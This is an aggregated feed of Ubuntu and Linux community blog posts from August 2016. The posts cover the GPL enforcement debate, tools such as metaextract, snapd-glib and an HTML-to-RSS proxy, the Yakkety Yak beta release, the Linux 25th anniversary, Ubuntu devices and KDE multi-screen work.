August 30, 2016

Last week a bun-fight kicked off on the Linux kernel mailing list that led to some interesting questions about how and when we protect open source projects from bad actors. It also shone a light on some interesting community dynamics.

The touchpaper was lit when Bradley Kuhn, president of the Software Freedom Conservancy (an organization that provides legal and administrative services for free software and open source projects) posted a reply to Greg KH on the Linux kernel mailing list:

I observe now that the last 10 years brought something that never occurred before with any other copylefted code. Specifically, with Linux, we find both major and minor industry players determined to violate the GPL, on purpose, and refuse to comply, and tell us to our faces: “you think that we have to follow the GPL? Ok, then take us to Court. We won’t comply otherwise.” (None of the companies in your historical examples ever did this, Greg.) And, the decision to take that position is wholly in the hands of the violators, not the enforcers.

He went on to say:

In response, we have two options: we can all decide to give up on the GPL, or we can enforce it in Courts.

This rather ruffled the feathers of Linus, who feels that lawyers are more a part of the problem than the solution:

The fact is, the people who have created open source and made it a success have been the developers doing work – and the companies that we could get involved by showing that we are not all insane crazy people like the FSF. The people who have destroyed projects have been lawyers that claimed to be out to “save” those projects.

What followed has been a long and quite interesting discussion that is still rumbling on.

In a nutshell, this rather heated (and at times unnecessarily personal) debate has focused on when is the right time to defend the rights enshrined in the GPL. Bradley is of the view that these rights should be intrinsically defended, as they are as important as (if not more important than) the code. Linus is of the view that the practicalities of the software industry mean sending in the lawyers can potentially have an even more damaging effect, as companies will tense up and choose to stay away.

Ethics and Pragmatism

Now, I have no dog in this race. I am a financial supporter of the Software Freedom Conservancy and the Free Software Foundation. I have an active working relationship with the Linux Foundation and I am friends with all the main players in this discussion: Linus, Greg, Bradley, Karen, Matthew, and Jeremy. I am not on anyone’s “side” here and I see value in the different perspectives brought to the table.

With that said, the core of this debate is the balance of ethics and pragmatism, something which has existed in open source and free software for a long time.

Linus and Bradley are good examples of either side of the aisle.

Linus has always been a pragmatic guy, and his stewardship of Linux has demonstrated that. Linus prioritizes the value of the GPL for practical software engineering and community-building purposes more than for wider ideological free software ambitions. With Linus, practicality and tangible output come first.

Bradley is different. For Bradley, software freedom is first and foremost a moral issue. Bradley’s talents and interests lie with the legal and copyright aspects more than with software engineering, so naturally his work has focused on licensing, copyright, and protection.

Now, this is not to suggest Linus doesn’t have ethics or that Bradley isn’t pragmatic, but their priorities are drawn in different areas. This results in differences in expectations, tone, and approach, with this debate being a good example.

Linus and Bradley are not alone here. For a long time there have been differences between organizations such as the Linux Foundation, the Free Software Foundation, and the Open Source Initiative. Again, each of these organizations draws its ethical and pragmatic priorities differently, and each attracts supporters who tend to share the same lines in the sand.

I am a supporter of all of these organizations. I believe the Linux Foundation has had an unbelievably positive effect in normalizing and bridging the open source culture, methodology, and mindset to the wider business world. The Open Source Initiative has done wonderful work as a steward of the licenses that thousands of organizations depend on. The Free Software Foundation has laid out a core set of principles around software freedom that are worthy for us all to strive for.

As such, I often take the view that everyone is bringing value, but everyone is also somewhat blinded by their own priorities and biases.

My Conclusion

Unsurprisingly, I see value in both sides of the debate.

Linus rightly raises the practicalities of the software industry. This is an industry that is driven by a wide range of different forcing functions and pressures: politics, competition, supply/demand, historical precedent, cultural norms, and more. Many of these companies do great things, and some do shitty things. That is human beings for you.

As such, and like any industry, nothing is black and white. This isn’t as simple as saying that Company A licenses code under the GPL, and if it doesn’t meet the expectations of the license it should face legal consequences until it does. Each company has a delicate mix of these driving forces, and Linus is absolutely right that legal recourse could potentially have the inverse effect of reducing participation rather than improving it.

On the other hand, the GPL (or any other open source license) does have to have meaning. As we have seen in countless societies throughout history, if rules are not enforced, people will naturally try to break them. This starts with small infractions and ultimately grows as the waters are tested. So, Bradley raises an important point: while we should take a realistic and pragmatic approach to the norms of the industry, we do need people who are willing and able to enforce open source licenses.

The subtlety is in how we handle this. We need to lead with nuance and negotiation, not with antagonistic legal implications. The lawyers have to be a last resort, and we should all be careful not to reach for overblown legal recourse against organizations that skirt the requirements of these licenses.

Anyone who has been working in this industry knows that the way you get things done in an organization is via a series of indirect nudges. We change organizations and industries through relationships, trust, and collaboration, and by providing a supporting function to accomplish the outcome we want.

Of course, sometimes there have to be legal consequences, but this has to genuinely be a last resort. We should not be under the illusion that legal action is an isolated act of protection. While legal action may protect the GPL in that specific scenario, it will also freak out lots of people watching it unfold. Thus, it is critical that we consider the optics of legal action as much as the practical benefits within that specific case.

The solution here, as is always the case, is more dialog that is empathetic to the views of those we disagree with. Linus, Bradley, and everyone else embroiled in this debate are on the right side of history. We just need to work together to find common ground and strategies: I am confident they are there.

What do you think? Do I have an accurate read on this debate? Am I missing something important? Share your thoughts below in the comments!

The post Linux, Linus, Bradley, and Open Source Protection appeared first on Jono Bacon.

on August 30, 2016 05:43 AM

August 29, 2016

Welcome to the Ubuntu Weekly Newsletter. This is issue #479 for the weeks of August 15 – 28, 2016, and the full version is available here.

In this issue we cover:

This issue of the Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Chris Sirrs
  • Simon Quigley
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution ShareAlike 3.0 License.

on August 29, 2016 11:58 PM

I recently blogged about Python packaging with py2pack. Meanwhile I created a new project called metaextract (available on github and pypi), based on the experience I gained while improving py2pack.

metaextract does only one thing: it extracts the metadata from a Python archive. Here’s an example – the output is JSON:

$ metaextract oslo.log-3.16.0.tar.gz
{
  "data": {
    "data_files": null,
    "entry_points": {
      "oslo.config.opts": [
        "oslo.log = oslo_log._options:list_opts"
      ]
    },
    "extras_require": {
      "fixtures": [
        "fixtures>=3.0.0 # Apache-2.0/BSD"
      ]
    },
    "has_ext_modules": null,
    "install_requires": [
      "debtcollector>=1.2.0",
      "oslo.config>=3.14.0",
      "oslo.context>=2.6.0",
      "oslo.i18n>=2.1.0",
      "oslo.serialization>=1.10.0",
      "oslo.utils>=3.16.0",
      "pbr>=1.6",
      "pyinotify>=0.9.6",
      "python-dateutil>=2.4.2",
      "six>=1.9.0"
    ],
    "scripts": null,
    "setup_requires": [
      "pbr>=1.8"
    ],
    "tests_require": [
      "bandit>=1.1.0",
      "coverage>=3.6",
      "hacking<0.11,>=0.10.0",
      "mock>=2.0",
      "oslosphinx!=3.4.0,>=2.5.0",
      "oslotest>=1.10.0",
      "python-subunit>=0.0.18",
      "reno>=1.8.0",
      "sphinx!=1.3b1,<1.3,>=1.2.1",
      "testrepository>=0.0.18",
      "testscenarios>=0.4",
      "testtools>=1.4.0"
    ]
  },
  "version": 1
}

The data is directly extracted from setuptools (or distutils). You can also run metaextract directly on a setup.py file:

$ python setup.py --command-packages=metaextract metaextract

or use it from your code:

$ python
>>> import pprint
>>> from metaextract import utils as meta_utils
>>> pprint.pprint(meta_utils.from_archive("oslo.log-3.16.0.tar.gz"))
{u'data': {u'data_files': None,
           u'entry_points': {u'oslo.config.opts': [u'oslo.log = oslo_log._options:list_opts']},
           u'extras_require': {u'fixtures': [u'fixtures>=3.0.0 # Apache-2.0/BSD']},
           u'has_ext_modules': None,
           u'install_requires': [u'debtcollector>=1.2.0',
                                 u'oslo.config>=3.14.0',
                                 u'oslo.context>=2.6.0',
                                 u'oslo.i18n>=2.1.0',
                                 u'oslo.serialization>=1.10.0',
                                 u'oslo.utils>=3.16.0',
                                 u'pbr>=1.6',
                                 u'pyinotify>=0.9.6',
                                 u'python-dateutil>=2.4.2',
                                 u'six>=1.9.0'],
           u'scripts': None,
           u'setup_requires': [u'pbr>=1.8'],
           u'tests_require': [u'bandit>=1.1.0',
                              u'coverage>=3.6',
                              u'hacking<0.11,>=0.10.0',
                              u'mock>=2.0',
                              u'oslosphinx!=3.4.0,>=2.5.0',
                              u'oslotest>=1.10.0',
                              u'python-subunit>=0.0.18',
                              u'reno>=1.8.0',
                              u'sphinx!=1.3b1,<1.3,>=1.2.1',
                              u'testrepository>=0.0.18',
                              u'testscenarios>=0.4',
                              u'testtools>=1.4.0']},
 u'version': 1}

on August 29, 2016 05:53 PM


Just a short reminder that tomorrow, Tuesday 30th August 2016 at 9am Pacific (see other time zone times here) I will be doing a Reddit AMA about community strategy/management, developer relations, open source, music, and anything else you folks want to ask about.

Want to ask questions about Canonical/GitHub/XPRIZE? Questions about building great communities? Questions about open source? Questions about politics or music? All questions are welcome!

To join, simply do the following:

  • Be sure to have a Reddit account. If you don’t have one, head over here and sign up.
  • On Tuesday 30th August 2016 at 9am Pacific (see other time zone times here) I will share the link to my AMA on Twitter (I am not allowed to share it until we run the AMA). You can look for this tweet by clicking here.
  • Click the link in my tweet to go to the AMA and then click the text box to add your question(s).
  • Now just wait until I respond. Feel free to follow up, challenge my response, and otherwise have fun!

I hope to see you all tomorrow!

The post Join my Reddit AMA Tomorrow appeared first on Jono Bacon.

on August 29, 2016 03:00 PM

Quite some time ago I sat down with Timo Jyrinki, a Canonical employee but more importantly, a Ubuntu community member who is involved with the local community team here in Finland. During the time we spent at the café we talked about a need to refresh the website for the Finnish LoCo team.

Relatively shortly after that, Timo, Jiri Grönroos and I landed a few quick patches to fix the most obvious problems with the website. After having done this, we all knew that the patches would only be more or less temporary, so I started working on a theme that the team could use.

While the original intention was to get a theme that would be a replacement for the current Finnish community teams website, it became apparent to me that other teams would likely prefer a new theme as well. Having figured this out, I kept flexibility and customizability in mind.

A few years after the first discussion about the theme, I’m happy to announce that the first public release of the Ubuntu community teams WordPress theme has been out (for a while already).

What does it look like?

Well, it looks quite a bit like the Ubuntu website.

Ubuntu community teams WordPress theme

Of course, being a theme for a large community, you can customize it to look more to your liking, without having to worry about anything breaking.

Ubuntu community teams WordPress theme (customized)

Ready to go?

If your site is managed by Canonical IS, ask them to enable the Ubuntu community WordPress theme for you – for clarity, you can link them to the Launchpad project ubuntu-community-wordpress-theme. They have agreed to maintain the theme centrally, so you will always get all updates and fixes to the theme as soon as they are released (and the changes have gone through their review).

If you manage your site yourself, you can get the code either from the Launchpad project mentioned above or from the source – the GitHub repository ubuntu-community-wordpress-theme. Instructions on how to set up the theme can be found in the README.

Whichever way you end up using the theme, some pointers on getting the most out of it can be found in the README.

Any questions?

If you have any questions, feedback or even feature requests, get in touch. I will happily help you with setting up the theme and making the Ubuntu community sites more beautiful.

on August 29, 2016 02:13 PM
It’s time once again for the Ubuntu Free Culture Showcase!

The Ubuntu Free Culture Showcase is a way to celebrate the Free Culture movement, where talented artists across the globe create media and release it under licenses that encourage sharing and adaptation. We're looking for content which shows off the skill and talent of these amazing artists and will greet Ubuntu 16.10 users.

More information about the Free Culture Showcase is available at https://wiki.ubuntu.com/UbuntuFreeCultureShowcase

This cycle, we're looking for beautiful wallpaper images that will literally set the backdrop for new users as they experience Ubuntu 16.10 for the first time.  Submissions will be handled via Flickr at https://www.flickr.com/groups/ubuntu-fcs-1610/

I'm looking forward to seeing the next round of entrants and a difficult time picking final choices to ship with Ubuntu 16.10.
on August 29, 2016 11:13 AM
Unusually early this time, Rhythmbox 3.4 has been released. It’s available for Yakkety users – but I’ve done some judicious hacking and it’s now also available for 16.04 users as well. (screenshot taken with rhythmbox 3.4 + my alternative-toolbar plugin) … Continue reading
on August 29, 2016 06:40 AM

August 28, 2016

Over the past month I've been hitting excessive thermal heating on my laptop and kidle_inject has been kicking in to try and stop the CPU from overheating (melting!).  A quick double-check with older kernels showed me that this issue was not a thermal/performance regression caused by software - instead it was time to clean my laptop and renew the thermal paste.

After some quick research, I found that Arctic MX-4 Thermal Compound provided an excellent thermal conductivity rating of 8.5 W/mK, so I ordered a 4g sample as well as a can of pressurized gas cleaner to clean out dust.

The X230 has an excellent hardware maintenance manual, and following the instructions I stripped the laptop right down so I could pop the heat pipe contacts off the CPU and GPU.  I carefully cleaned off the old dry and cracked thermal paste and applied about 0.2g of MX-4 thermal compound to the CPU and GPU and re-seated the heat pipe.  With the pressurized gas I cleaned out the fan and airways to maximize airflow over the heatpipe.   The entire procedure took about an hour to complete and for once I didn't have any screws left over after re-assembly!

I normally take photos of the position of components during the strip-down of a laptop for reference in case I cannot figure out exactly how parts are meant to fit during the re-assembly phase.  In this case, the X230 maintenance manual is sufficiently detailed, so I didn't take any photos this time.

I'm glad to report that my X230 is now no longer overheating. Heat is being effectively pumped away from the CPU and GPU and one can feel the additional heat being pushed out of the laptop.  Once again I can fully max out the CPU and GPU without passive thermal cooling mechanisms kicking into action, so I've now got 100% of my CPU performance back again; as good as new!

Now and again I see laptop overheating bugs being filed in Launchpad.  While some are legitimate issues with broken software, I do wonder if the majority of issues with older laptops are simply due to an accumulation of dust and/or old and damaged thermal paste.
on August 28, 2016 05:30 PM

August 27, 2016

facelift

Sebastian Kügler

I’ve done a facelift to my website. The new version is more mobile-friendly, modern-looking and quite a departure visually from its original look. I’ve chosen a newspaper-like, typography-based responsive layout. My site finally also supports SSL, thanks to Let’s Encrypt.

Going to Akademy
Next week, I’ll be going to Akademy, which is co-hosted with QtCon. As usual, my focus will be around Plasma-related topics. I’ll also give a presentation about a KDE software store.

on August 27, 2016 11:47 PM
Hi all, this is about a small issue I ran into over the last few days: using a calculator in the terminal. While working I sometimes need to do an arithmetic operation, so I would open the default Ubuntu calculator. But I kept wondering: there has to be a way to use a calculator in the CLI. So after some searching I found this question on Ask Ubuntu and tried several options.

I will only write about the best solution I found for my needs. In the question you can find several solutions, and you may well find a different one that works best for you.

CALC (Arbitrary precision calculator)

Calc is an arbitrary precision arithmetic system that uses a C-like language. Calc is useful as a calculator, an algorithm prototyper and as a mathematical research tool. More importantly, calc provides one with a machine independent means of computation. Calc comes with a rich set of builtin mathematical and programmatic functions.

If you want to install calc you can use the following command:

sudo apt-get install apcalc
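
Once installed (the apcalc package provides the binary as calc), here is a quick usage sketch – exact output formatting may differ slightly on your system:

$ calc '2 + 3 * 4'
	14
$ calc 'sqrt(2)'
	~1.41421356237309504880
$ calc          # start an interactive session; leave it with "quit"
; 7!/5!
	42
; quit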

on August 27, 2016 11:44 PM

This is about a fun little project I already wrote a few months ago, completely unrelated to other things I’m usually writing about, but I thought it might be useful for others too.

When I moved to Greece last year, I had the problem that there were not many news websites that provided local news in English and actually had an RSS feed. And having local news, next to global news about what happens all over the world, seems like a good way to know what happens close around you.
The only useful website I found was Ekathimerini. There were two others that seemed useful to have, The Press Project (a crowd-funded project) and To Vima, but neither has an RSS feed (or at least not for their English versions). Of course the real solution to this problem is to learn Greek, which I’m doing now, but it’s going to take a while until I’m able to understand news articles without too much effort.

So what did I do? I wrote a small web service that parses the HTML of those websites and returns an RSS feed based on it; it also updates regularly in the background and keeps some history of items. You can find it here: html-rss-proxy. The resulting RSS feeds seem to work very well in Liferea and Newsblur at least.

Since then it has also been extended with another news website, and generally it’s rather simple to add new ones to the code. You just need to figure out how to extract the relevant information from the HTML of some website, convert that into code like here, and wrap it up in the general interface that the other parts of the code expect, like here.

If you add some website yourself, feel free to send me a pull request and I’ll merge it!

Technical bits

On the technical side, this seems to be one of the most stable pieces of software I have ever written. It has never crashed or otherwise failed since I started running it, and fortunately I also haven’t had to update the HTML parsing code yet because of website changes.

It’s written in Haskell, using the Scotty web framework, Cereal serialization library for storing the history of the past articles, http-conduit for fetching the websites, and html-conduit for parsing the HTML. Overall a very pleasant experience, thanks to the language being very convenient to write and preventing most silly mistakes at compile-time, and the high quality of the libraries.

The only part I’m not yet too happy about is the actual HTML parsing; it seems too verbose and redundant. I might port it to another library at a later time, maybe xml-html-conduit-lens.

Update

After saying that I don’t like the HTML parsing, I have actually reimplemented it around xml-html-conduit-lens now. The result is much shorter code that resembles the structure of the HTML, as you can see here for example.

Considering that people always say that lens is so complicated, and this is more than just simple getters, I have to say it went rather painlessly. Only the compiler errors when the types don’t match are a bit tricky to understand at first.

on August 27, 2016 03:02 PM

August 26, 2016

Qt 5 based Colorpick

Aurélien Gâteau

Colorpick is one of my little side-projects. It is a tool to select colors. It comes with a screen color picker and the ability to check that two colors contrast well enough to be used as foreground and background colors for text.

Contrast check

Three instances of Colorpick showing how the background color can be adjusted to make the text readable.

The color picker

The color picker in action. The cursor can be moved using either the mouse or the arrow keys.

I wrote this tool a few years ago, using Python 2, PyQt 4 and PyKDE 4. It was time for an update. I started by porting it to Python 3, only to find out that apparently there are no Python bindings for KDE Frameworks...

Colorpick uses a few kdelibs widgets, and some color utilities. I could probably have rewritten those in PyQt 5, but I was looking for a pretext to have a C++ based side-project again, so instead I rewrote it in C++, using Qt 5 and a couple of KF5 libraries. The code base is small and PyQt code is often very similar to C++ Qt code, so it only took a few 45-minute train commutes to get it ported.

If you are a Colorpick user and were sad to see it still using Qt 4, or if you are looking for a color picker, give it a try!

on August 26, 2016 07:07 PM

August 25, 2016

Introducing snapd-glib

Robert Ancell

World, meet snapd-glib. It's a new library that makes it easy for GLib based projects (e.g. software centres) to access the daemon that allows you to query, install and remove Snaps. If C is not for you, you can use all the functionality in Python (using GObject Introspection) and Vala. In the future it will support Qt/QML through a wrapper library.

snapd uses a REST API and snapd-glib very closely matches that. The behaviour is best understood by reading the documentation of that API. To give you a taste of how it works, here's an example that shows how to find and install the VLC snap.

Step 1: Connecting to snapd

The connection to snapd is controlled through the SnapdClient object. This object has all the methods required to communicate with snapd. Create and connect with:

    g_autoptr(SnapdClient) c = snapd_client_new ();
    if (!snapd_client_connect_sync (c, NULL, &error))
        // Something went wrong


Step 2: Find the VLC snap 

Asking snapd to perform a find causes it to contact the remote Snap store. This can take some time so consider using an asynchronous call for this. This is the synchronous version:

    g_autoptr(GPtrArray) snaps =
        snapd_client_find_sync (c,
                                SNAPD_FIND_FLAGS_NONE, "vlc",
                                NULL, NULL, &error);
    if (snaps == NULL)
        // Something went wrong
    for (int i = 0; i < snaps->len; i++) {
        SnapdSnap *snap = snaps->pdata[i];
        // Do something with this snap information
    }


Step 3: Authenticate 

Some methods require authorisation in the form of a Macaroon (the linked description is quite complex, but in practice it's just a couple of strings). To get a Macaroon you need to provide credentials to snapd. In Ubuntu this is your Ubuntu account, but different snapd installations may use another authentication provider.

Convert credentials to authorization with:

    g_autoptr(SnapdAuthData) auth_data =
        snapd_client_login_sync (c,
                                 email, password, code,
                                 NULL, &error);
    if (auth_data == NULL)
        return EXIT_FAILURE;


Once you have a Macaroon you can store it somewhere and re-use it next time you need it. Then the authorization can be created with:

    g_autoptr(SnapdAuthData) auth_data =
        snapd_auth_data_new (macaroon, discharges);
    snapd_client_set_auth_data (c, auth_data);

Step 4: Install VLC 

In step 2 we could determine that the VLC snap has the name "vlc". Since this involves downloading ~100MB and is going to take some time, the asynchronous method is used. There is a callback that gives updates on the progress of the install and one that is called when the operation completes:
 
    snapd_client_install_async (c,
                                "vlc", NULL,
                                progress_cb, NULL,
                                NULL,
                                install_cb, NULL);


static void
progress_cb (SnapdClient *client,
             SnapdTask *main_task, GPtrArray *tasks,
             gpointer user_data)
{
    // Tell the user what's happening
}

static void
install_cb (GObject *object, GAsyncResult *result,
            gpointer user_data)
{
    g_autoptr(GError) error = NULL;

    if (snapd_client_install_finish (SNAPD_CLIENT (object),
                                     result, &error))
        // It installed!
    else
        // Something went wrong...
}


Conclusion 

With snapd-glib and the above code as a starting point you should be able to start integrating Snap support into your project. Have fun!
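
If you want to try the snippets above, something along these lines should build a small test program – note that the pkg-config module name snapd-glib is an assumption here, so check what your snapd-glib package actually installs:

    $ gcc -o snap-demo snap-demo.c $(pkg-config --cflags --libs snapd-glib gio-2.0)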
on August 25, 2016 10:59 PM
Lubuntu Yakkety Yak Beta 1 (soon to be 16.10) has been released! We have a couple of papercuts listed in the release notes, so please take a look. A big thanks to the whole Lubuntu team and contributors for helping pull this release together. You can grab the images from here: http://cdimage.ubuntu.com/lubuntu/releases/yakkety/beta-1/
on August 25, 2016 10:50 PM

The Jogpa, in our mad flight, cut off a long lock of the yak’s silky hair. Having secured this, he appeared to be quite satisfied, let go, and sheathed his sword.

– Arnold Henry Savage Landor

The first beta of the Yakkety Yak (to become 16.10) has now been released!

This milestone features images for Lubuntu, Ubuntu GNOME, Ubuntu Kylin, Ubuntu MATE and Ubuntu Studio.

Pre-releases of the Yakkety Yak are not encouraged for anyone needing a stable system or anyone who is not comfortable running into occasional, even frequent breakage. They are, however, recommended for Ubuntu flavor developers and those who want to help in testing, reporting and fixing bugs as we work towards getting this bos grunniens ready.

Beta 1 includes a number of software updates that are ready for wider testing. These images are still under development, so you should expect some bugs.

While these Beta 1 images have been tested and work, except as noted in the release notes, Ubuntu developers are continuing to improve the Yakkety Yak. In particular, once newer daily images are available, system installation bugs identified in the Beta 1 installer should be verified against the current daily image before being reported in Launchpad. Using an obsolete image to re-report bugs that have already been fixed wastes your time and the time of developers who are busy trying to make 16.10 the best Ubuntu release yet. Always ensure your system is up to date before reporting bugs.

Lubuntu

Lubuntu is a flavor of Ubuntu based on LXDE and focused on providing a very lightweight distribution.

The Lubuntu 16.10 Beta 1 images can be downloaded from:

More information about Lubuntu 16.10 Beta 1 can be found here:

Ubuntu GNOME

Ubuntu GNOME is a flavour of Ubuntu featuring the GNOME desktop environment.

The Ubuntu GNOME 16.10 Beta 1 images can be downloaded from:

More information about Ubuntu GNOME 16.10 Beta 1 can be found here:

Ubuntu Kylin

Ubuntu Kylin is a flavour of Ubuntu that is more suitable for Chinese users. The Ubuntu Kylin 16.10 Beta 1 images can be downloaded from:

More information about Ubuntu Kylin 16.10 Beta 1 can be found here:

Ubuntu MATE

Ubuntu MATE is a flavour of Ubuntu featuring the MATE desktop environment for people who just want to get stuff done. The Ubuntu MATE 16.10 Beta 1 images can be downloaded from:

More information about Ubuntu MATE 16.10 Beta 1 can be found here:

Ubuntu Studio

Ubuntu Studio is a flavour of Ubuntu configured for multimedia production. The Ubuntu Studio 16.10 Beta 1 images can be downloaded from:

More information about Ubuntu Studio 16.10 Beta 1 can be found here:

If you’re interested in following the changes as we further develop the Yakkety Yak, we suggest that you subscribe to the ubuntu-devel-announce list. This is a low-traffic list (a few posts a month) carrying announcements of approved specifications, policy changes, beta releases and other interesting events.

http://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-announce

A big thank you to the developers and testers for their efforts to pull together this Beta release!

In addition, we would like to wish Linux a happy 25th birthday!

Originally posted to the ubuntu-release mailing list on Thu Aug 25 22:14:28 UTC 2016 by Set Hallstrom and Simon Quigley on behalf of the Ubuntu Release Team

on August 25, 2016 10:33 PM

The Breath of Time

Alessio Treglia

 

For centuries man hunted, brought animals to pasture, cultivated fields and sailed the seas without any kind of tool to measure time. Back then, time was not measured but only estimated with vague approximation, and that pace was enough to dictate the steps of the day and the life of man. Subsequently, for many centuries, hourglasses accompanied civilization with the slow flow of their sand grains. About hourglasses, Ernst Jünger writes in “Das Sanduhrbuch” (1954, no English translation): “This small mountain, formed by all the lost moments that fell on each other, could be understood as a comforting sign that time disappears but does not fade. It grows in depth”.

For the philosophers of ancient Greece, time was just a way to measure how things move in everyday life, and in any case there was a clear distinction between “quantitative” time (Kronos) and “qualitative” time (Kairòs). According to Parmenides, time is mere appearance, because its existence…

<Read More…[by Fabio Marzocca]>

on August 25, 2016 04:33 PM

KDevelop, Muon, Plasma 5.7.4

Jonathan Riddell

To celebrate the release of KDevelop 5 we’ve added KDevelop 5 to KDE neon User Edition.  Git Stable and Git Unstable builds are also in the relevant Developer Editions.

But wait… that’s not all… the package manager Muon seems to have a new maintainer, so to celebrate we added builds in User Edition and Git Unstable Developer Edition.

Plasma 5.7.4 has been out for some time now so it’s well past time to get it into Neon, delayed by a move in infrastructure which caused the entire repository to rebuild.  All Plasma packages should be updated now in KDE neon User Edition.

Want to install it? The weekly User Edition ISO has been updated and looks lovely.

on August 25, 2016 03:30 PM

Happy 25th birthday Linux. It’s a monumental milestone!

Over the years Canonical has been working on putting Linux in the hands of millions of people and worked with various hardware vendors to release over 1000 models of Linux hardware (!)

Today we’re celebrating by showcasing 25 Ubuntu devices released over the years, from laptops, netbooks, tower computers, phones, tablets, development boards and drones to robotic spiders. We hope you enjoy the list – there are some golden oldies – and we look forward to the next 25 years!

Plus if you have a favourite device from the list (or not), why not let us know by tweeting #UbuntuDevices – enjoy!

25 Ubuntu Devices

1. System76 (June 2005) System76 was the first hardware vendor to offer packaged Ubuntu laptops, desktops and servers!
2. Dell Inspiron Mini 9 (Sep 2008) The Dell Inspiron Mini Series was a line of subnotebook/netbook computers designed by Dell
3. ZaReason Verix 545 (Jun 2010) ZaReason only makes Linux computers
4. HP Mini 5103 (Sep 2010) Another netbook!
5. HP Compaq 4000 (Jan 2011) A stable and reliable PC mainly for business use
6. Dell Wyse T50 (Sep 2011) Fast and affordable thin client for cloud client computing deployments
7. Asus Eee PC 1015CX (March 2012) Netbooks are still in favour… getting smaller and cheaper!
8. Acer Veriton Z (Jan 2013) One of the many towers running Ubuntu
9. Turtlebot 2 (March 2013) The 2nd iteration of the robotic development platform
10. BQ E4.5 (Feb 2015) And here it is – our very first Ubuntu Phone!
11. Raspberry Pi 2 (Feb 2015) A collaboration with the Raspberry Pi Foundation where Snappy Ubuntu Core is available for the Raspberry Pi 2
12. Meizu MX4 (July 2015) Our first release with Chinese partners, Meizu
13. Lenovo ThinkPad L450 (July 2015) Continually shipping Ubuntu pre-installed on laptops worldwide
14. Intel Compute Stick (July 2015) Enabling the transformation of a display into a fully functioning computer for home use or digital signage!
15. Erle Spider (Sep 2015) The first legged drone powered by ROS and running Snappy Ubuntu Core
16. Dell XPS 15 (October 2015) The second iteration of this laptop built for developers who need a powerful Linux desktop!
17. Robotics OP2 (Oct 2015) All we can say is, he was a hit at MWC 16!
18. DJI Manifold (Nov 2015) A high-performance embedded computer designed specifically to fly
19. BQ Aquaris M10 (Feb 2016) Reinventing the personal mobile computing experience with our first converged device
20. Meizu PRO 5 (Feb 2016) Our most powerful phone to date!
21. Intel NUC (Feb 2016) A platform for developers to test and create x86-based IoT solutions using Snappy Ubuntu Core, also used for digital signage solutions
22. Samsung Artik 5+10 (May 2016) Developer images available for both boards!
23. Bubblegum 96 board (July 2016) Image of Ubuntu Core available for uCRobotics on this awesome board
24. Mycroft (July 2016) The open source answer to natural language platforms
25. Intel Joule board (Aug 2016) A new development board in the Ubuntu family, targeting IoT and robotics makers

Want to find out how to develop for all these great devices? Develop with Ubuntu

on August 25, 2016 02:52 PM

S09E26 – Mosaic Promise - Ubuntu Podcast

Ubuntu Podcast from the UK LoCo

It’s Episode Twenty-six of Season Nine of the Ubuntu Podcast! Mark Johnson, Alan Pope, Laura Cowen, and Martin Wimpress are here again.

We’re here – all of us!

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

on August 25, 2016 02:00 PM


I embarked on the Linux journey in 2004 when I joined the newly founded Canonical and its not-yet-named Ubuntu team. I knew there was incredible opportunity around Linux but even then it wasn’t clear how pervasive Linux would become in all corners of technology, industry and society. Linux started its journey as a platform for researchers and developers and over the last 25 years it has become the innovator’s production platform across all computing platforms we use today. Perhaps it is fairer to say that the world has become developer-led, and since Linux is the first choice of developers, the world has adopted Linux by default. Servers, mobile, IoT and more all primarily run on Linux because the developers who make the most interesting things generally start on Linux.

Canonical is proud to support Linux with Ubuntu as the developer platform of choice. Enabling developers to be agile and effective is the best way to encourage the next wave of technical innovation. The leaders in drones, robotics, blockchain, artificial intelligence, self-driving cars and computer vision are all blazing their trail on Ubuntu today, and they are the technologies that will shape our lives in the coming years. Canonical shapes Ubuntu to be the fastest, easiest and most economical way to deliver innovation in real products – from the cloud to the edge of the network.

We’re also incredibly proud to continue to support Linux’s journey as the production platform for the enterprise and telecoms infrastructure we see today. Ubuntu is used in more than 55% of the production OpenStack clouds around the world. Enterprise and Telco deployments on Ubuntu have changed the way business deploys IT infrastructure. And we are already leading on what’s next for the future of cloud computing with NFV, Containerisation, and Machine Learning. On the IoT front we’re reshaping the nature of the device and the software operations experience for distributed computing with Ubuntu Core, built for IoT deployments where transactional upgrades, constrained environments, and security are the primary requirements.

While the cloud runs almost entirely on Linux, we think the desktop remains an important focus for Linux innovation too. Ubuntu started from the desktop, and is still innovating with the creation of a unique experience that converges the mobile and desktop worlds. Containers of all forms – Docker, LXD and snap packaging – are a new way for developers to design, distribute and run applications across clouds, devices and distributions.

So what do the next 25 years look like? As they say, the future is already here, just not evenly distributed. With machine learning progress going exponential, I think societies in the future can expect to put even more trust in software for their everyday needs, and I’m glad that the trend is increasingly in favour of software that is shared, that is free for all to build upon, and that can be examined and improved by anybody. Public benefit depends on private innovation, and the fact that Linux as an open platform exists enables that innovation to come from anywhere. That’s something to celebrate. Happy birthday, Linux!

on August 25, 2016 08:00 AM

August 24, 2016

Plasma 5.8 will be our first long-term supported release in the Plasma 5 series. We want to make this a release as polished and stable as possible. One area we weren’t quite happy with was our multi-screen user experience. While it works quite well for most of our users, there were a number of problems which made our multi-screen support sub-par.
Let’s take a step back to define what we’re talking about.

Multi-screen support means connecting more than one screen to your computer. The following use cases give good examples of the scope:

  • Static workstation A desktop computer with more than one display connected, the desktop typically spans both screens to give more screen real estate.
  • Docking station A laptop computer that is hooked up to a docking station with additional displays connected. This is a more interesting case, since different configurations may be picked depending on whether the laptop’s lid is closed or not, and how the user switches between displays.
  • Projector The computer is connected to a projector or TV.

The idea is that when the user plugs in or starts up with that configuration, and has already configured this hardware combination, that setup is restored. Otherwise, a reasonable guess is made to put the user at a good starting point to fine-tune the setup.

Screenshot: a video wall configuration (kcm-videowall)
This is the job of KScreen. At a technical level, kscreen consists of three parts:

  • system settings module This can be reached through system settings
  • kscreen daemon Run in a background process, this component saves, restores and creates initial screen configurations.
  • libkscreen This is the library providing the screen setup reading and writing API. It has backends for X11, Wayland, and others, which allow talking to the exact same programming interface, independent of the display server in use.

